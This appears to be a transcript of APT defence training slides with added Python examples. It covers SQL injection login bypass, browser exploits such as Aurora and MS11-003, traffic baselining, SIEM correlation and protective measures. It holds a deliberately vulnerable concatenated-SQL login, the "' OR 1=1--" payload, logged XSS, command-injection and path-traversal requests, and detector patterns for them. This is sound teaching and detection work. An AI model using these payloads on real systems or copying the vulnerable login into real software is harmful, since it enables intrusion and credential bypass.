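           "' AND Password='" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    """Hardened form: the SQL text is fixed and the values travel as bound
    parameters, so whatever the user typed is compared as a string and is
    never parsed as SQL."""
    sql = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def run_demo():
    """Replay a legitimate login and the Demo #1 payload through both forms."""
    conn = make_db()
    injected = "' OR 1=1--"   # Demo #1 input from the slide
    return {
        "legit_vulnerable": login_vulnerable(conn, "jv", "jv789"),
        "legit_parameterized": login_parameterized(conn, "jv", "jv789"),
        "injected_vulnerable": login_vulnerable(conn, injected, "anything"),
        "injected_parameterized": login_parameterized(conn, injected, "anything"),
    }


if __name__ == "__main__":
    for case, authenticated in run_demo().items():
        print(f"{case:24s} authenticated={authenticated}")
```

With the concatenated query the injected username makes Count(*) return 3 and the login succeeds; with bound parameters the same string is just a username that matches no row. The same change defuses the Demo #2 probes, since error-based enumeration depends on attacker text reaching the SQL parser, and the error text itself should in any case never be echoed to the browser. A real login would also compare a password hash rather than the plaintext the slide's query implies.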
Browser Exploits

Browser Exploit
• Internet Explorer Memory Corruption
• MS10-002 – aka "Aurora"
• Solution to Aurora was DEP & ASLR
• We are going to run this on our Windows XP system
• Just needed the user to click on a link that was trusted on a website or e-mail

Aurora Demonstration

Browser Exploit
• Internet Explorer CSS Recursive Import Use After Free
• Exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml)
• When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused.
• This leads to arbitrary code execution.
• This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module

Browser Exploit
• This module is reliable on all Windows versions with .NET 2.0.50727 installed (IE 6-8)
• Specifically uses the exploit documented in MS11-003.
• Just needed the user to click on a link that was trusted on a website or e-mail
• Bypasses DEP and ASLR
– Address space layout randomization - technique which involves randomly arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, in a process's address space.
– Data Execution Prevention - prevents an application or service from executing code from a non-executable memory region

DEP Bypass Demonstration

APT IN DEPTH
DETECTING APT

All About the Traffic...
• As we have seen… successful targeted attacks depend on remote access and control
• The network activity associated with remote control can be identified, contained and disrupted through the analysis of outbound network traffic.
• Important to know what is normal and what is not – baselining
• If an APT attacker wants to stay hidden, he will try to mimic normal traffic/access as much as possible

All About the Traffic...
• Look for outbound traffic patterns that are out of the ordinary
– DNS requests to non-internal name servers
– Large amounts of traffic leaving your network to non-North American destinations
– Port 80/443 requests to sites in *.ru and *.cn
– Access to known malware domains
– Use of credentials on interesting or abnormal systems

All About the Traffic...
• Look for inbound traffic patterns that are out of the ordinary
– Connections to interesting ports from unknown sources such as TCP/1433, TCP/8080, TCP/53, UDP/53
– "Normal" looking traffic from countries you do not do business with (i.e. China TCP/80)
– Consistent inbound "portscan" traffic from eastern Europe and Asia on non-well-known ports (i.e. C&C)

All About the Traffic

All About the Traffic – Typical Botnet
Look at all the sources of information…

Web Traffic
• Another important source of information
• If you can pull it into a SIEM, your job could be easier
• Manually, you want to look at the following:
– Apache – access_log, error_log
– IIS6 - %windir%\System32\LogFiles, IIS7 - %SystemDrive%\inetpub\logs\LogFiles
• Looking at these logs will help you identify:
– SQL Injection attacks
– XSS
– Path Traversal
– Etc.
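An added example (not from the slides) that turns the outbound and inbound patterns on the two "All About the Traffic" slides above into detection rules over constructed flow records of the kind a firewall log or NetFlow export provides. The internal range, approved resolver, malware-domain entry, addresses and the scan threshold are all assumptions; the "large amounts of traffic to non-North American destinations" pattern is left out because it needs GeoIP data and byte counts that these records do not carry.

```python
"""Added example (not from the slides): the outbound/inbound traffic patterns
listed on the 'All About the Traffic' slides, applied to constructed flow
records. Internal range, approved resolver, malware-domain feed entry and
the portscan threshold are assumptions."""
import ipaddress
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network("192.168.67.0/24")]   # assumed internal range
APPROVED_RESOLVERS = {"192.168.67.10"}                      # assumed internal DNS server
KNOWN_MALWARE_DOMAINS = {"bad.example"}                      # constructed feed entry
INTERESTING_INBOUND_PORTS = {("tcp", 1433), ("tcp", 8080), ("tcp", 53), ("udp", 53)}
FOREIGN_TLDS = (".ru", ".cn")
SCAN_THRESHOLD = 5   # distinct high ports from one source before calling it a scan

# Constructed flow records: (proto, src, dst, dport, destination hostname or None)
FLOWS = [
    ("udp", "192.168.67.20", "192.168.67.10", 53, None),      # normal internal DNS
    ("udp", "192.168.67.21", "203.0.113.5", 53, None),        # DNS to an outside resolver
    ("tcp", "192.168.67.22", "198.51.100.7", 443, "update.example.cn"),
    ("tcp", "192.168.67.22", "198.51.100.8", 80, "bad.example"),
    ("tcp", "203.0.113.9", "192.168.67.10", 1433, None),      # inbound to SQL Server port
    ("tcp", "203.0.113.9", "192.168.67.10", 8080, None),
] + [("tcp", "203.0.113.44", "192.168.67.11", p, None)       # one source, many high ports
     for p in (4444, 5555, 6666, 7777, 8888)]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def classify_flows(flows):
    """Return a list of (rule, evidence) findings; a flow may trip several rules."""
    findings = []
    high_ports_by_src = defaultdict(set)
    for flow in flows:
        proto, src, dst, dport, host = flow
        outbound = is_internal(src) and not is_internal(dst)
        inbound = not is_internal(src) and is_internal(dst)
        if outbound:
            if dport == 53 and dst not in APPROVED_RESOLVERS:
                findings.append(("dns-to-external-resolver", flow))
            if dport in (80, 443) and host and host.endswith(FOREIGN_TLDS):
                findings.append(("web-to-foreign-tld", flow))
            if host in KNOWN_MALWARE_DOMAINS:
                findings.append(("known-malware-domain", flow))
        elif inbound:
            if (proto, dport) in INTERESTING_INBOUND_PORTS:
                findings.append(("inbound-interesting-port", flow))
            if dport > 1023:
                high_ports_by_src[src].add(dport)
    # Portscan rule needs the whole batch: many distinct high ports from one source
    for src, ports in high_ports_by_src.items():
        if len(ports) >= SCAN_THRESHOLD:
            findings.append(("inbound-portscan", (src, sorted(ports))))
    return findings


def summarize(findings):
    """Count findings per rule, the shape a SIEM dashboard row would show."""
    counts = defaultdict(int)
    for rule, _ in findings:
        counts[rule] += 1
    return dict(counts)


if __name__ == "__main__":
    for rule, evidence in classify_flows(FLOWS):
        print(f"{rule:28s} {evidence}")
```

The per-flow rules are stateless; the portscan rule is the one that needs the batch, which is why it runs after the loop. In production the same logic would be fed from exported flow records, and the hostname field would come from the proxy or DNS log rather than from the flow itself.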
Web Traffic - XSS
• 217.160.165.173 [12/Mar/2004:22:31:12 0500] "GET /foo.jsp?<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 200 578 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
• 217.160.165.173 [12/Mar/2004:22:37:17 0500] "GET /cgi-bin/cvslog.cgi?file=<SCRIPT>window.alert</SCRIPT> HTTP/1.1" 403 302 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
• These represent XSS type attacks

Web Traffic - Injection
• 81.171.1.165 [13/Mar/2004:10:46:43 0500] "HEAD http://www.sweetgeorgia.com/cgi-bin/af.cgi?_browser_out=|echo;id;exit| HTTP/1.0" 200 0 "http://www.sweetgeorgia.com/cgi-bin/af.cgi?_browser_out=|echo;id;exit|" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
• Trying to execute OS commands. The variable '_browser_out' contains a pipe symbol, followed by Unix system commands ('|echo;id;exit|').

Web Traffic - Injection
• 66.138.147.49 [13/Mar/2004:13:33:06 0500] "GET http://login.korea.yahoo.com/config/login?.redir_from=PROFILES?.&login=&.tries=1&.src=jpg&.last=&promo=&.intl=us&.bypass=&.partner=&.chkP=Y&.done=http://jpager.yahoo.com/jpager/pager2.shtml&login=blood`1234567890&passwd=password HTTP/1.0" 200 566 "" ""
• Calling a login function. In its login name (parameter 'login') is a back tick symbol ('blood`1234567890').
• This might be a simple brute force attack or a test of how the application handles the back tick symbol.

Web Traffic – Path Traversal
• 68.48.142.117 [09/Mar/2004:22:29:43 0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/+dir HTTP/1.0" 200 566 "" ""
• The '%255c' is a double percent hex encoding. The '%25' resolves to a percent character ('%'), and the resulting '%5c' resolves to a backslash ('\').
• The request tries to access the cmd.exe program, the Windows command shell, to execute the 'dir' command (list all files in a directory).

Detecting APT
SECURITY INFORMATION EVENT MANAGEMENT

Security Information Event Mgmt.
• Aka "SIEM"
• Reducing Security Information "Overload"
• Gathering, correlating, aggregating, analyzing and presenting information from disparate systems
• Normally provides dashboards, alerting, etc. to allow security analysts to wade through the millions of events in their organizations
• Some free tools – Splunk, OSSEC, Snort

Use of SIEM Products
• On their own, they are useless
• SIEM products do a great job at aggregating and correlating traffic
• Without intelligence, a SIEM won't detect a relentless targeted attack designed to avoid raising any red flags
• They're normally tuned to catch unusual activity, not stealthy attacks that hide behind legitimate user credentials or normal traffic.
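For the access-log entries on the Web Traffic slides above, an added example (not from the slides) that parses Apache combined-format lines and flags the XSS, OS command injection and double-encoded path traversal requests shown there, plus a SQL injection probe of the kind the Web Traffic slide lists first. The sample lines are constructed after the slides' entries: the ident/user fields and a signed timezone offset are added so they match the combined format, and the SQL injection line is invented for the example.

```python
"""Added example (not from the slides): a classifier for Apache combined-format
access log lines that flags the request patterns the Web Traffic slides
describe (XSS, OS command injection, double-encoded path traversal) plus a
SQL injection probe. The sample lines are constructed after the slides'
entries."""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (ident/user fields added to match the combined format)
SAMPLE_LOG = [
    '217.160.165.173 - - [12/Mar/2004:22:31:12 -0500] "GET /foo.jsp?<SCRIPT>foo</SCRIPT>.jsp HTTP/1.1" 200 578 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"',
    '81.171.1.165 - - [13/Mar/2004:10:46:43 -0500] "HEAD /cgi-bin/af.cgi?_browser_out=|echo;id;exit| HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '68.48.142.117 - - [09/Mar/2004:22:29:43 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/+dir HTTP/1.0" 200 566 "-" "-"',
    '198.51.100.3 - - [13/Mar/2004:14:02:11 -0500] "GET /login.aspx?user=%27%20OR%201%3D1-- HTTP/1.1" 200 1200 "-" "-"',
    '192.168.67.20 - - [13/Mar/2004:14:05:00 -0500] "GET /index.html HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
]


def fully_decode(text, max_rounds=3):
    """Percent-decode until the string stops changing and report how many
    rounds it took: more than one round is the double-encoding signature
    the path traversal slide explains (%255c -> %5c -> backslash)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds


def classify_request(url):
    """Return the list of rule names a request URL trips, after decoding."""
    decoded, rounds = fully_decode(url)
    rules = []
    if re.search(r"<\s*script", decoded, re.IGNORECASE):
        rules.append("xss")
    query = decoded.partition("?")[2]
    if re.search(r"[|`]", query):                      # pipe or backtick in a parameter
        rules.append("os-command-injection")
    if re.search(r"\.\.[\\/]", decoded):               # ../ or ..\ after decoding
        rules.append("path-traversal" + ("-double-encoded" if rounds > 1 else ""))
    if re.search(r"('\s*or\s+1\s*=\s*1|union\s+select|--\s*$)", query, re.IGNORECASE):
        rules.append("sql-injection")
    return rules


def scan_log(lines):
    """Parse each line; return {(src, url): [rules]} for suspicious requests."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue        # a malformed line deserves its own alert in practice
        rules = classify_request(m["url"])
        if rules:
            hits[(m["src"], m["url"])] = rules
    return hits


if __name__ == "__main__":
    for (src, url), rules in scan_log(SAMPLE_LOG).items():
        print(f"{src:16s} {', '.join(rules):30s} {url}")
```

Decoding before matching is the point of the example: a filter that looks for "../" in the raw request misses the %255c line entirely, while one that decodes exactly once sees only %5c. The patterns are deliberately narrow; a production ruleset (mod_security's core rules, for instance) is far larger, but the same decode-then-match structure applies.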
"A better SIEM with faster results and operationalizing security data in a way that closes that window and risk in a more timely manner limits the amount of time the attacker" (Eddie Schwartz – CSO, RSA)

Exception Monitoring
• A SIEM is designed to alert on events (the "E" in SIEM)
• We have to focus on what traffic/activity is normal = "Baseline" and then zero in on the exceptions to this
• Organizations put lots of dollars into buying SIEMs to meet PCI-DSS compliance
• We have to re-direct our SIEM to deal with APT, not compliance
• We are not simply looking for non-compliant systems based on a predetermined policy, we are looking at modeling behavior and understanding what is normal and what is not

Exception Monitoring – Example #1
• Say your SIEM logs physical access (through your ID badge system)
• On Tuesday at 4:00pm you see Joe Smith swipe his card exiting the HQ building
• On Tuesday at 4:02pm you see Joe Smith log in to a server on the perimeter of your network…
• Correlation becomes very important!

Exception Monitoring – Example #2
• Sally is a financial analyst who accesses PeopleSoft, e-mail, billing system
• On Wednesday, logs show she has attempted to access a Unix box running DNS for the organization
• Sally, based on access correlation and baselining, logs into the Active Directory between 8:30am and 8:39am M-F
• We have noted logins to the AD on Saturday and Sunday at 1:31am, 6:02am, and 8:33pm.
• What does this tell us?

APT IN DEPTH
HOW DO I PROTECT MYSELF?

What do I do?
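The two Exception Monitoring examples above written as correlation rules, added here as an example that is not from the slides. The usernames, host names, timestamps, the 15-minute exit-to-login window and Sally's baseline are constructed to reproduce the Joe Smith and Sally scenarios; a real deployment would load the baseline from weeks of observed logins rather than a literal.

```python
"""Added example (not from the slides): Exception Monitoring Examples #1 and
#2 as correlation rules over constructed badge and authentication events.
Users, hosts, timestamps, the window and the baseline are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

EXIT_TO_LOGIN_WINDOW = timedelta(minutes=15)   # assumed correlation window

# Constructed events: (timestamp, source, user, action, target). Oct 4 2011 is a Tuesday.
EVENTS = [
    (datetime(2011, 10, 4, 16, 0), "badge", "jsmith", "exit", "HQ"),
    (datetime(2011, 10, 4, 16, 2), "auth", "jsmith", "login", "dmz-web01"),
    (datetime(2011, 10, 3, 8, 33), "auth", "sally", "login", "ad-dc01"),       # Monday
    (datetime(2011, 10, 4, 8, 35), "auth", "sally", "login", "ad-dc01"),       # Tuesday
    (datetime(2011, 10, 5, 8, 31), "auth", "sally", "login", "ad-dc01"),       # Wednesday
    (datetime(2011, 10, 5, 10, 12), "auth", "sally", "login", "unix-dns01"),   # Wednesday
    (datetime(2011, 10, 8, 1, 31), "auth", "sally", "login", "ad-dc01"),       # Saturday
    (datetime(2011, 10, 9, 20, 33), "auth", "sally", "login", "ad-dc01"),      # Sunday
]

# Constructed baseline: what is normal for each user, as prior baselining would record it
BASELINE = {
    "sally": {"hosts": {"peoplesoft", "mail", "billing", "ad-dc01"},
              "weekdays": {0, 1, 2, 3, 4},            # Mon-Fri
              "hours": ((8, 30), (8, 39))},            # AD login window 8:30-8:39
}


def exit_then_login(events, window=EXIT_TO_LOGIN_WINDOW):
    """Example #1: a badge exit followed, inside the window, by a login from
    the same user. Events are sorted so each login sees only earlier exits."""
    alerts = []
    last_exit = {}
    for ts, source, user, action, target in sorted(events):
        if source == "badge" and action == "exit":
            last_exit[user] = ts
        elif source == "auth" and action == "login" and user in last_exit:
            if timedelta(0) <= ts - last_exit[user] <= window:
                alerts.append((user, target, ts))
    return alerts


def baseline_exceptions(events, baseline=BASELINE):
    """Example #2: logins outside the user's known hosts, days or time window.
    Each alert carries every reason that applied, so a Saturday 1:31am login
    shows up as both off-day and off-hours."""
    alerts = defaultdict(list)
    for ts, source, user, action, target in events:
        if source != "auth" or action != "login" or user not in baseline:
            continue
        b = baseline[user]
        reasons = []
        if target not in b["hosts"]:
            reasons.append("unknown-host")
        if ts.weekday() not in b["weekdays"]:
            reasons.append("off-day")
        (h1, m1), (h2, m2) = b["hours"]
        if not ((h1, m1) <= (ts.hour, ts.minute) <= (h2, m2)):
            reasons.append("off-hours")
        if reasons:
            alerts[user].append((ts, target, reasons))
    return dict(alerts)


if __name__ == "__main__":
    for user, target, ts in exit_then_login(EVENTS):
        print(f"exit-then-login: {user} on {target} at {ts}")
    for user, hits in baseline_exceptions(EVENTS).items():
        for ts, target, reasons in hits:
            print(f"baseline exception: {user} {target} {ts} {reasons}")
```

Neither rule fires on a single event in isolation, which is the slides' point: the 4:02pm login is unremarkable until it is joined with the 4:00pm badge exit, and Sally's AD logins only stand out against the window her own history established.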
1. Early warning
2. Protection
3. Remediation
4. Counter measures

Before you can protect yourself…
• You have to understand A/V is not going to answer the following:
– Who is targeting you?
– What are they after?
– Have they succeeded?
– How long have they been succeeding?
– What have I lost so far?
– Who is patient zero?
– How does this spread?

Time to Update Your Inventory…
• Organizations have to start to better understand what assets they have hanging out on the public Internet
• In many cases, organizations are hit because they didn't know about that "box in the corner, under someone's desk, that has a NAT to the Internet".

Inspect/Secure DNS
• Watch your DNS logs to see what users are trying to resolve
• Could lead you to understand whether or not users are infected (C&C) or whether they are going to be (phishing links)
• Are you allowing DNS resolution on name servers outside your organization?
• Split DNS, split/split DNS, split/split/split DNS

Architect Your Network for Attack
• Expect that a breach will occur – architect based on this
• Layer your security controls (router, perimeter firewall, proxy, host FW, host security)
• Although layering is important, always remember the increased emphasis on protecting the data itself.
• Increase the level of monitoring and intrusion detection
• Honeypots can help
• The dreaded "ANY/ANY" (both ingress/egress)

Take Care of Your Web Apps
• Web applications remain the low-hanging fruit for attackers.
• Yes, penetration testing is important - but these measures perpetuate a whack-a-mole security strategy that is neither manageable nor sustainable
• Make investments in secure code review, securely configured Web server environments, and vigilant monitoring of Web activity.

Take Care of Your Web Apps
• Monitor their logs – incorporate into your SIEM
• Deploy an application proxy such as mod_proxy
– Screens and blocks common vulnerable requests (i.e. SQL injection, XSS, etc.)
– Advanced audit and logging functionality
– Layer of obfuscation – your web app is not directly on the Internet

Geo-blocking….
• Block IP networks based on country location
• Can be ingress and/or egress
• For example, block all traffic from China, Ukraine, etc.
• Usually done at a perimeter router level
• Not always easy - to block a country you first must have the entire range of IP addresses that were assigned to that country – you could block legitimate traffic!

Watch Network Traffic
• Look at the possibility of a SIEM tool – allows for aggregation and correlation (there are commercial and open source flavors of this)
• Normalize your network traffic patterns
– What is normal and what is not (isolate what is not, and investigate as possible attacks)
• Look at DLP as a potential solution
• Rootkits can hide on a system but network traffic cannot be hidden
• Understand all traffic patterns and look for anomalies
– If you have an IDS/IPS make sure it is baselined

Watch Network Traffic
• Monitor cyber security events 24 x 7.
– Advanced persistent threats like those that hit organizations are just that--persistent--and require constant vigilance.
• Across the federal government, agencies are investing in "continuous monitoring," with a goal of obtaining a near real-time view into the status of computer system security.

Protect the Endpoint
• Patch your systems
– Un-patched Adobe (Acrobat, Flash) and Microsoft (Windows, Office) are big reasons why machines are infected
• Protect the endpoint
– Whitelisting technology? We know what is good, block everything else.

Test Your Systems
• Perform a risk assessment to understand where to focus your protective systems (important as cost may be prohibitive to secure everything)
• Vulnerability management (i.e. scanning system) to continually scan assets for systems that may fall outside of compliance (i.e. configuration, patches, etc.)

Proxy your Internet Traffic
• As opposed to direct Internet via a NAT
• Control and logging
• Consider "honeypotting" for internal networks
• You can use whitelisting/blacklisting technologies as well (i.e. Websense, 8e6, BlueCoat, etc.)

Response
• Have a proper incident response process on how to deal with these issues
• Remove devices from the network immediately or monitor what the attackers are doing
• Post-event analysis is important as well

Research
• Keep up to date on intelligence reports from trusted security sources on what attacks you need to look out for – many times specific attack vectors can be found (i.e. C&C connects to systems on port TCP/666)

Intelligence Feeds
• Malwaredomainlist.com
• Abuse.ch
• Spamcop.net
• Team-cymru.net
• Shadowserver.org

Education
• Make sure your security team (or group responsible for monitoring) knows what to look for (i.e. education)
• Education
– About spear-phishing, malware sites, etc. (what should they not click, not plugging unknown USB sticks into their PCs, etc.)
– Get other groups that can be vocal for you to assist (i.e. PR, HR, etc.)
• Social engineering is a real threat – ensure your organization is trained on how to deal with this threat

Test your Organization
• Spear-phish a sample of your staff from a crafted e-mail account
• Include a link to a website, log traffic
• Leave some candy in the lunchroom (i.e. DVD, USB stick, etc.) – think autorun.
• You will be surprised what you find!

Control Systems
• If you are an organization that has sensitive control systems (i.e. power utility)
• Next-generation automation and control systems must be hardened and made resilient against the same kinds of attacks we contend with on the Internet.
• Traditional control system design assumptions and security measures need to be reassessed as embedded devices adopt open, rather than proprietary, standards, and as logical and even physical separation from the Internet becomes harder to assure

Purge legacy, minority technologies
• The Web server in the first attack was based on a little-used technology at the lab, Adobe ColdFusion.
• Such out-of-sight, out-of-mind technologies are inherently vulnerable because they don't get the same degree of attention as an organization's primary platforms.

On a closing note….
"Maintain a constant state of Suspicious Alertness!"
Lieutenant Colonel Kazinski, Jarhead (2005)

Thank you!
Questions or Comments?
Peter Morin
902-229-6282
peter.morin@bellaliant.ca
http://www.twitter.com/@petermorin123